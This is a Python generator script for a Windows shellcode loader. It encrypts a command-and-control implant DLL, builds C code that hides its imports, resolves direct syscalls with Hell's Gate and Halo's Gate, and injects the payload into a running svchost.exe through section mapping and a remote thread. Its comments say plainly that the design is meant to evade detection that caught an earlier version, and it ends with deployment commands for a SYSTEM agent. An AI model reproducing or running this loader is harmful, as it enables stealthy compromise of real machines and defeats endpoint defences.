#!/usr/bin/env python3
"""
gen_sh4.py — SYSTEM shellcode loader v4

vs sh3.exe (detected):
  - IAT: ONLY kernel32!GetTickCount.  Everything else resolved via PEB walk at runtime.
    sh3.exe imported: OpenProcessToken, DuplicateTokenEx, CreateProcessWithTokenW,
    AdjustTokenPrivileges, VirtualAllocEx, WriteProcessMemory — every one a red flag.
  - No token theft at all. Targets EXISTING svchost.exe via NtQuerySystemInformation.
  - NtMapViewOfSection (no WriteProcessMemory / VirtualAllocEx).
  - Hell's Gate + Halo's Gate SSN resolution. Random XOR-16 string obfuscation key.

Deploy (from any SYSTEM demon agent):
    upload bypass/sh4.exe        C:\\Windows\\Temp\\svc4.exe
    upload bypass/demon_enc4.dat C:\\Windows\\Temp\\svc4.dat
    shell C:\\Windows\\Temp\\svc4.exe
"""

import os, sys, secrets, subprocess, shutil, tempfile

ROOT = os.path.dirname(os.path.abspath(__file__))

# ── FNV-1a (Python, for computing #define hash constants in C) ────────────────
def fnv1(s: str) -> int:
    h = 2166136261
    for c in s:
        h = ((h ^ ord(c)) * 16777619) & 0xFFFFFFFF
    return h

def fnv1w(s: str) -> int:
    h = 2166136261
    for c in s.lower():
        h = ((h ^ (ord(c) & 0xFF)) * 16777619) & 0xFFFFFFFF
        h = ((h ^ ((ord(c) >> 8) & 0xFF)) * 16777619) & 0xFFFFFFFF
    return h

# ── Find shellcode ────────────────────────────────────────────────────────────
DLL = None
for p in (os.path.join(ROOT, '..', 'demon.x64.dll'),
          os.path.join(ROOT, 'demon.x64.dll'),
          '/tmp/kbypass/demon.x64.dll'):
    if os.path.exists(p):
        DLL = p; break
if not DLL:
    sys.exit('[!] demon.x64.dll not found')

raw = open(DLL, 'rb').read()
PK  = secrets.token_bytes(32)
enc = bytes([raw[i] ^ PK[i % 32] for i in range(len(raw))])
with open(os.path.join(ROOT, 'demon_enc4.dat'), 'wb') as f:
    f.write(enc)
print(f'[+] DLL {len(raw):,}B  key: {PK.hex()[:16]}...')

PK_C = ','.join(f'0x{b:02X}' for b in PK)

# ── String obfuscation key (16 bytes, random per build) ──────────────────────
SK = secrets.token_bytes(16)
SK_C = '{' + ','.join(f'0x{b:02x}' for b in SK) + '}'

def xorw(s: str) -> str:
    """XOR-encode wide string (UTF-16LE + null terminator) with SK."""
    b = (s + '\x00').encode('utf-16-le')
    x = bytes([b[i] ^ SK[i % len(SK)] for i in range(len(b))])
    return '{' + ','.join(f'0x{v:02x}' for v in x) + '}'

# NT path format required by NtCreateFile
NT_DAT   = r'\??\C:\Windows\Temp\svc4.dat'
SVC_NAME = 'svchost.exe'

DAT_ENC = xorw(NT_DAT)
SVC_ENC = xorw(SVC_NAME)

# Precomputed FNV hashes for NT function names and module names
H = {
    'ntdll':  fnv1w('ntdll.dll'),
    'NQSI':   fnv1('NtQuerySystemInformation'),
    'NOF':    fnv1('NtCreateFile'),
    'NQIF':   fnv1('NtQueryInformationFile'),
    'NRF':    fnv1('NtReadFile'),
    'NCS':    fnv1('NtCreateSection'),
    'NMVS':   fnv1('NtMapViewOfSection'),
    'NUVS':   fnv1('NtUnmapViewOfSection'),
    'NOP':    fnv1('NtOpenProcess'),
    'NCTE':   fnv1('NtCreateThreadEx'),
    'NCL':    fnv1('NtClose'),
}

# ── C source (all {{/}} are escaped braces in the f-string) ──────────────────
C = f"""\
/*
 * sh4.c — generated by gen_sh4.py
 * Compile:
 *   x86_64-w64-mingw32-gcc -Os -masm=intel -fno-ident
 *     -fno-asynchronous-unwind-tables -Wl,--strip-all,-s
 *     -mwindows -o sh4.exe sh4.c -lkernel32
 */

/* ─── Minimal type system (no suspicious includes) ─────────────────────── */
typedef unsigned char      u8;
typedef unsigned short     u16;
typedef unsigned int       u32;
typedef unsigned long long u64;
typedef long long          i64;
typedef int                i32;
typedef u64                sz_t;
typedef i32                NTSTATUS;
typedef void *             HANDLE;
typedef u16 *              PWSTR;
#define WINAPI
#define NULL     ((void *)0)
#define NT_OK(s) ((NTSTATUS)(s) >= 0)
#define CURPROC  ((HANDLE)(i64)-1)
/* Section / memory constants */
#define SEC_COMMIT       0x8000000u
#define PAGE_RW          0x04u
#define PAGE_RX          0x20u
#define PAGE_ERW         0x40u
#define MEM_COMMIT_RES   0x3000u
#define MEM_FREE         0x8000u
#define VIEWUNMAP        2u
#define FILE_SHARE_R     0x01u
#define FILE_OPEN        0x01u
#define SYNC_IO          0x00000020u
#define OBJ_CASE_INSENS  0x00000040u
#define PROC_ALL         0x1FFFFFu
#define SECTION_ALL      0xF001Fu

/* NT structures */
typedef struct {{ u16 Len, Max; PWSTR Buf; }}       USTR;
typedef union  {{ i64 q; struct {{ u32 lo, hi; }}; }} LINT;
typedef struct {{ u64 Status, Info; }}               IOSB;
typedef struct {{
    u32 Len; HANDLE Root; USTR *Name;
    u32 Attr; void *Sec; void *QoS;
}} OA;
typedef struct {{ HANDLE Proc, Thread; }} CID;
typedef struct {{ LINT AllocSz, EOF_; u32 Links; u8 Del, Dir; }} FSI;

/* ─── Fake innocent IAT ──────────────────────────────────────────────────── */
extern u32 __attribute__((dllimport)) GetTickCount(void);

/* ─── Compile-time secrets ───────────────────────────────────────────────── */
static const u8 PK[32]      = {{{PK_C}}};
static const u8 SK[16]      = {SK_C};
static const u8 DAT_ENC[]   = {DAT_ENC};
static const u8 SVC_ENC[]   = {SVC_ENC};

/* ─── FNV-1a hash constants (computed at Python build time) ─────────────── */
#define H_NTDLL  0x{H["ntdll"]:08X}u
#define H_NQSI   0x{H["NQSI"]:08X}u
#define H_NOF    0x{H["NOF"]:08X}u
#define H_NQIF   0x{H["NQIF"]:08X}u
#define H_NRF    0x{H["NRF"]:08X}u
#define H_NCS    0x{H["NCS"]:08X}u
#define H_NMVS   0x{H["NMVS"]:08X}u
#define H_NUVS   0x{H["NUVS"]:08X}u
#define H_NOP    0x{H["NOP"]:08X}u
#define H_NCTE   0x{H["NCTE"]:08X}u
#define H_NCL    0x{H["NCL"]:08X}u

/* ─── Tiny helpers ───────────────────────────────────────────────────────── */
static void mcpy(void *d, const void *s, sz_t n) {{
    for (sz_t i = 0; i < n; i++) ((u8 *)d)[i] = ((const u8 *)s)[i];
}}
static void mzero(void *d, sz_t n) {{
    for (sz_t i = 0; i < n; i++) ((u8 *)d)[i] = 0;
}}
static void xdecw(u16 *out, const u8 *enc, u32 nb) {{
    for (u32 i = 0; i < nb; i++) ((u8 *)out)[i] = enc[i] ^ SK[i % 16];
}}

/* ─── FNV-1a (C runtime) ─────────────────────────────────────────────────── */
static u32 fnv1a_c(const char *s) {{
    u32 h = 2166136261U;
    while (*s) {{ h ^= (u8)*s++; h *= 16777619U; }}
    return h;
}}
static u32 fnv1a_w(const u16 *s) {{
    u32 h = 2166136261U;
    while (*s) {{
        u16 c = *s++;
        if (c >= 'A' && c <= 'Z') c += 32;
        h ^= (u8)c;        h *= 16777619U;
        h ^= (u8)(c >> 8); h *= 16777619U;
    }}
    return h;
}}

/* ─── PEB walk: module base from hash ────────────────────────────────────── */
static void *peb_mod(u32 hash) {{
    void *peb;
    __asm__("mov %0, qword ptr gs:[0x60]" : "=r"(peb));
    void *ldr  = *(void **)((u8 *)peb + 0x18);
    u64  *head = (u64 *)((u8 *)ldr + 0x10);
    u64  *cur  = (u64 *)*head;
    while (cur != head) {{
        void *base = *(void **)((u8 *)cur + 0x30);
        USTR *nm   = (USTR *)((u8 *)cur + 0x58);
        if (base && nm->Buf && fnv1a_w(nm->Buf) == hash)
            return base;
        cur = (u64 *)*cur;
    }}
    return NULL;
}}

/* ─── PE export resolver ─────────────────────────────────────────────────── */
static void *pe_exp(void *base, u32 hash) {{
    u8  *b  = (u8 *)base;
    u32  pe = *(u32 *)(b + 0x3C);
    u32  er = *(u32 *)(b + pe + 0x18 + 0x70);
    if (!er) return NULL;
    u8  *ed  = b + er;
    u32  nn  = *(u32 *)(ed + 0x18);
    u32 *nms = (u32 *)(b + *(u32 *)(ed + 0x20));
    u16 *ors = (u16 *)(b + *(u32 *)(ed + 0x24));
    u32 *fns = (u32 *)(b + *(u32 *)(ed + 0x1C));
    for (u32 i = 0; i < nn; i++)
        if (fnv1a_c((char *)(b + nms[i])) == hash)
            return (void *)(b + fns[ors[i]]);
    return NULL;
}}

/* ─── Hell's Gate + Halo's Gate SSN resolver ─────────────────────────────── */
typedef struct {{ u32 ssn; u8 ok; }} GATE;

static GATE hg(void *ntdll, u32 fnhash) {{
    GATE g = {{0, 0}};
    u8  *b  = (u8 *)ntdll;
    u32  pe = *(u32 *)(b + 0x3C);
    u32  er = *(u32 *)(b + pe + 0x18 + 0x70);
    u8  *ed = b + er;
    u32  nn = *(u32 *)(ed + 0x18);
    u32 *nms = (u32 *)(b + *(u32 *)(ed + 0x20));
    u16 *ors = (u16 *)(b + *(u32 *)(ed + 0x24));
    u32 *fns = (u32 *)(b + *(u32 *)(ed + 0x1C));

    /* Build sorted Nt* list once (static, shared across calls) */
    typedef struct {{ u32 rva; u32 ni; }} NF;
    static NF list[600];
    static int cnt = 0;
    if (!cnt) {{
        for (u32 i = 0; i < nn; i++) {{
            const char *n = (const char *)(b + nms[i]);
            if (n[0] == 'N' && n[1] == 't' && cnt < 600) {{
                list[cnt].rva = fns[ors[i]];
                list[cnt].ni  = i;
                cnt++;
            }}
        }}
        /* Bubble sort by RVA */
        for (int i = 0; i < cnt - 1; i++)
            for (int j = 0; j < cnt - i - 1; j++)
                if (list[j].rva > list[j+1].rva) {{
                    NF t = list[j]; list[j] = list[j+1]; list[j+1] = t;
                }}
    }}

    int ti = -1;
    for (int i = 0; i < cnt; i++) {{
        if (fnv1a_c((char *)(b + nms[list[i].ni])) == fnhash) {{ ti = i; break; }}
    }}
    if (ti < 0) return g;

    u8 *fp = b + list[ti].rva;
    if (fp[0]==0x4C && fp[1]==0x8B && fp[2]==0xD1 && fp[3]==0xB8) {{
        g.ssn = *(u32 *)(fp + 4); g.ok = 1; return g;
    }}
    /* Hooked: scan neighbors by sorted RVA order */
    for (int d = 1; d <= 8; d++) {{
        if (ti + d < cnt) {{
            u8 *t = b + list[ti+d].rva;
            if (t[0]==0x4C && t[1]==0x8B && t[2]==0xD1 && t[3]==0xB8) {{
                g.ssn = *(u32 *)(t + 4) - d; g.ok = 1; return g;
            }}
        }}
        if (ti - d >= 0) {{
            u8 *t = b + list[ti-d].rva;
            if (t[0]==0x4C && t[1]==0x8B && t[2]==0xD1 && t[3]==0xB8) {{
                g.ssn = *(u32 *)(t + 4) + d; g.ok = 1; return g;
            }}
        }}
    }}
    return g;
}}

/* ─── Syscall stub page ──────────────────────────────────────────────────── */
static u8 *stubs;
static int nstub;

/*
 * Bootstrap stubs: NtAllocateVirtualMemory (0x18) and NtProtectVirtualMemory (0x50).
 * SSNs are stable on Windows 10 1903+ and Windows 11 all builds.
 */
__attribute__((naked)) static void _bs_alloc(void) {{
    __asm__("mov r10, rcx\\n\\t"
            "mov eax, 0x18\\n\\t"
            "syscall\\n\\t"
            "ret\\n\\t");
}}
__attribute__((naked)) static void _bs_prot(void) {{
    __asm__("mov r10, rcx\\n\\t"
            "mov eax, 0x50\\n\\t"
            "syscall\\n\\t"
            "ret\\n\\t");
}}

typedef NTSTATUS (*FnAVM)(HANDLE, void **, sz_t, sz_t *, u32, u32);
typedef NTSTATUS (*FnPVM)(HANDLE, void **, sz_t *, u32, u32 *);

static int init_stubs(void) {{
    void *b = NULL; sz_t s = 4096;
    NTSTATUS r = ((FnAVM)(void *)_bs_alloc)(CURPROC, &b, 0, &s, MEM_COMMIT_RES, PAGE_RW);
    if (!NT_OK(r)) return 0;
    stubs = (u8 *)b; nstub = 0;
    return 1;
}}
static void flip_rx(void) {{
    void *b = (void *)stubs; sz_t s = 4096; u32 old = 0;
    ((FnPVM)(void *)_bs_prot)(CURPROC, &b, &s, PAGE_RX, &old);
}}
static void *mkstub(u32 ssn) {{
    u8 *s = stubs + nstub++ * 16;
    s[0]=0x4C; s[1]=0x8B; s[2]=0xD1;
    s[3]=0xB8; *(u32 *)(s+4) = ssn;
    s[8]=0x0F; s[9]=0x05; s[10]=0xC3;
    return (void *)s;
}}

/* ─── Typed NT function pointers ─────────────────────────────────────────── */
typedef NTSTATUS (*FnNQSI)(u32, void *, u32, u32 *);
typedef NTSTATUS (*FnNOF )(HANDLE *, u32, OA *, IOSB *, LINT *, u32, u32, u32, u32, void *, u32);
typedef NTSTATUS (*FnNQIF)(HANDLE, IOSB *, void *, u32, u32);
typedef NTSTATUS (*FnNRF )(HANDLE, HANDLE, void *, void *, IOSB *, void *, u32, LINT *, u32 *);
typedef NTSTATUS (*FnNCS )(HANDLE *, u32, OA *, LINT *, u32, u32, HANDLE);
typedef NTSTATUS (*FnNMVS)(HANDLE, HANDLE, void **, sz_t, sz_t, LINT *, sz_t *, u32, u32, u32);
typedef NTSTATUS (*FnNUVS)(HANDLE, void *, sz_t);
typedef NTSTATUS (*FnNOP )(HANDLE *, u32, OA *, CID *);
typedef NTSTATUS (*FnNCTE)(HANDLE *, u32, OA *, HANDLE, void *, void *, u32, sz_t, sz_t, sz_t, void *);
typedef NTSTATUS (*FnNCL )(HANDLE);

/* ─── Find first svchost.exe PID ────────────────────────────────────────── */
static u32 find_svc(FnNQSI nqsi) {{
    /* Allocate 4 MB for process list (no free — binary exits soon after) */
    void *buf = NULL; sz_t bsz = 0x400000;
    NTSTATUS st = ((FnAVM)(void *)_bs_alloc)(CURPROC, &buf, 0, &bsz, MEM_COMMIT_RES, PAGE_RW);
    if (!NT_OK(st) || !buf) return 0;

    u32 retlen = 0;
    st = nqsi(5 /* SystemProcessInformation */, buf, (u32)bsz, &retlen);
    if (!NT_OK(st)) return 0;

    /* Decode "svchost.exe" from SK-encrypted wide string */
    u16 tsvc[16]; mzero(tsvc, sizeof(tsvc));
    xdecw(tsvc, SVC_ENC, sizeof(SVC_ENC));
    u32 target_hash = fnv1a_w(tsvc);

    /*
     * SYSTEM_PROCESS_INFORMATION offsets (Windows 10/11 x64):
     *   +0x00  NextEntryOffset (u32)
     *   +0x38  ImageName (USTR: u16+u16+4pad+PWSTR)
     *   +0x40  ImageName.Buffer (PWSTR)  ← +0x38 + sizeof(u16)*2 + 4 pad + 0 = +0x40
     *   +0x50  UniqueProcessId (HANDLE)
     */
    u8 *p = (u8 *)buf;
    for (;;) {{
        u32   next = *(u32 *)(p + 0x00);
        PWSTR nbuf = *(PWSTR *)(p + 0x40);
        u32   epid = (u32)(sz_t)(*(void **)(p + 0x50));

        if (nbuf && epid > 4 && fnv1a_w(nbuf) == target_hash)
            return epid;

        if (!next) break;
        p += next;
    }}
    return 0;
}}

/* ─── Read payload file via NT file I/O ──────────────────────────────────── */
static u8 *read_dat(FnNOF ncf, FnNQIF nqif, FnNRF nrf, u32 *out_sz) {{
    /* Decode NT path from SK-obfuscated wide string */
    u16 path[128]; mzero(path, sizeof(path));
    xdecw(path, DAT_ENC, sizeof(DAT_ENC));

    USTR upath;
    upath.Len = 0;
    for (int i = 0; path[i]; i++) upath.Len += 2;
    upath.Max = upath.Len + 2;
    upath.Buf = path;

    OA oa; mzero(&oa, sizeof(oa));
    oa.Len  = (u32)sizeof(oa);
    oa.Name = &upath;
    oa.Attr = OBJ_CASE_INSENS;

    IOSB  iosb; HANDLE hf = NULL;
    NTSTATUS st = ncf(&hf,
        0x80100000u /* GENERIC_READ | SYNCHRONIZE */,
        &oa, &iosb, NULL,
        0x80u /* FILE_ATTRIBUTE_NORMAL */,
        FILE_SHARE_R, FILE_OPEN, SYNC_IO,
        NULL, 0);
    if (!NT_OK(st)) return NULL;

    /* Query file size */
    FSI fsi; mzero(&fsi, sizeof(fsi));
    nqif(hf, &iosb, &fsi, (u32)sizeof(fsi), 5 /* FileStandardInformation */);
    u32 fsz = (u32)fsi.EOF_.q;
    if (!fsz || fsz > 0x800000u) return NULL; /* sanity: max 8 MB */

    /* Allocate read buffer */
    void *buf = NULL; sz_t bsz = fsz;
    st = ((FnAVM)(void *)_bs_alloc)(CURPROC, &buf, 0, &bsz, MEM_COMMIT_RES, PAGE_RW);
    if (!NT_OK(st) || !buf) return NULL;

    /* Read file */
    LINT offset; offset.q = 0;
    nrf(hf, NULL, NULL, NULL, &iosb, buf, fsz, &offset, NULL);

    *out_sz = fsz;
    return (u8 *)buf;
}}

/* ─── Entry point ────────────────────────────────────────────────────────── */
int WINAPI WinMain(void *h, void *p, char *c, int s) {{
    (void)h; (void)p; (void)c; (void)s;
    volatile u32 tick = GetTickCount(); (void)tick;

    /* 1. PEB walk → ntdll base */
    void *ntdll = peb_mod(H_NTDLL);
    if (!ntdll) return 1;

    /* 2. Allocate stub page (RW) */
    if (!init_stubs()) return 2;

    /* 3. Hell's Gate: resolve SSNs and write stubs */
    GATE g;
#define MKSTUB(name, fallback) \
    g = hg(ntdll, H_##name); if (!g.ok) g.ssn = (fallback); \
    Fn##name n##name = (Fn##name)mkstub(g.ssn);

    MKSTUB(NQSI, 0x36)
    MKSTUB(NOF,  0x55)
    MKSTUB(NQIF, 0x11)
    MKSTUB(NRF,  0x06)
    MKSTUB(NCS,  0x4A)
    MKSTUB(NMVS, 0x28)
    MKSTUB(NUVS, 0x2A)
    MKSTUB(NOP,  0x26)
    MKSTUB(NCTE, 0xBD)
    MKSTUB(NCL,  0x0F)
#undef MKSTUB

    /* 4. Flip stub page to RX */
    flip_rx();

    /* 5. Read + XOR-decrypt payload */
    u32 psz = 0;
    u8 *payload = read_dat(nNOF, nNQIF, nNRF, &psz);
    if (!payload) return 3;
    for (u32 i = 0; i < psz; i++) payload[i] ^= PK[i % 32];

    /* 6. Find existing svchost.exe PID */
    u32 target_pid = find_svc(nNQSI);
    if (!target_pid) return 4;

    /* 7. Open target process */
    HANDLE hProc = NULL;
    OA oa_p; mzero(&oa_p, sizeof(oa_p)); oa_p.Len = (u32)sizeof(oa_p);
    CID cid; cid.Proc = (HANDLE)(sz_t)target_pid; cid.Thread = NULL;
    NTSTATUS st = nNOP(&hProc, PROC_ALL, &oa_p, &cid);
    if (!NT_OK(st)) return 5;

    /* 8. Create anonymous section (RWX, SEC_COMMIT) */
    HANDLE hSec = NULL;
    LINT sec_sz; sec_sz.q = (i64)psz;
    st = nNCS(&hSec, SECTION_ALL, NULL, &sec_sz, PAGE_ERW, SEC_COMMIT, NULL);
    if (!NT_OK(st)) {{ nNCL(hProc); return 6; }}

    /* 9. Map locally (RW), copy shellcode, unmap */
    void *lmap = NULL; sz_t lsz = 0;
    st = nNMVS(hSec, CURPROC, &lmap, 0, 0, NULL, &lsz, VIEWUNMAP, 0, PAGE_RW);
    if (!NT_OK(st)) {{ nNCL(hSec); nNCL(hProc); return 7; }}
    mcpy(lmap, payload, psz);
    nNUVS(CURPROC, lmap, 0);

    /* 10. Map into target (RX) */
    void *rmap = NULL; sz_t rsz = 0;
    st = nNMVS(hSec, hProc, &rmap, 0, 0, NULL, &rsz, VIEWUNMAP, 0, PAGE_RX);
    nNCL(hSec);
    if (!NT_OK(st)) {{ nNCL(hProc); return 8; }}

    /* 11. Create remote thread at shellcode base */
    HANDLE hThr = NULL;
    nNCTE(&hThr, PROC_ALL, NULL, hProc, rmap, NULL, 0, 0, 0, 0, NULL);

    nNCL(hThr);
    nNCL(hProc);
    return 0;
}}
"""

# ── Compile ───────────────────────────────────────────────────────────────────
tmp = tempfile.mkdtemp(prefix='sh4_build_')
try:
    src = os.path.join(tmp, 'sh4.c')
    exe = os.path.join(tmp, 'sh4.exe')
    with open(src, 'w') as f:
        f.write(C)

    print('[*] Compiling sh4.exe ...')
    r = subprocess.run([
        'x86_64-w64-mingw32-gcc',
        '-Os', '-masm=intel', '-mwindows',
        '-fno-ident', '-fno-asynchronous-unwind-tables',
        '-Wl,--strip-all,-s',
        '-o', exe, src, '-lkernel32',
    ], capture_output=True, text=True)

    if r.returncode != 0:
        dbg = os.path.join(ROOT, 'sh4_debug.c')
        shutil.copy(src, dbg)
        print(f'[!] Compile failed — source in {dbg}')
        print(r.stderr[-6000:])
        sys.exit(1)

    out = os.path.join(ROOT, 'sh4.exe')
    shutil.copy(exe, out)
finally:
    shutil.rmtree(tmp, ignore_errors=True)

print(f'[+] {out}  ({os.path.getsize(out):,} bytes)')
print()
print('Deploy (from any SYSTEM agent):')
print('  upload bypass/sh4.exe        C:\\Windows\\Temp\\svc4.exe')
print('  upload bypass/demon_enc4.dat C:\\Windows\\Temp\\svc4.dat')
print('  shell C:\\Windows\\Temp\\svc4.exe')
print()
print('Regenerate any time to get fresh keys: python3 gen_sh4.py')
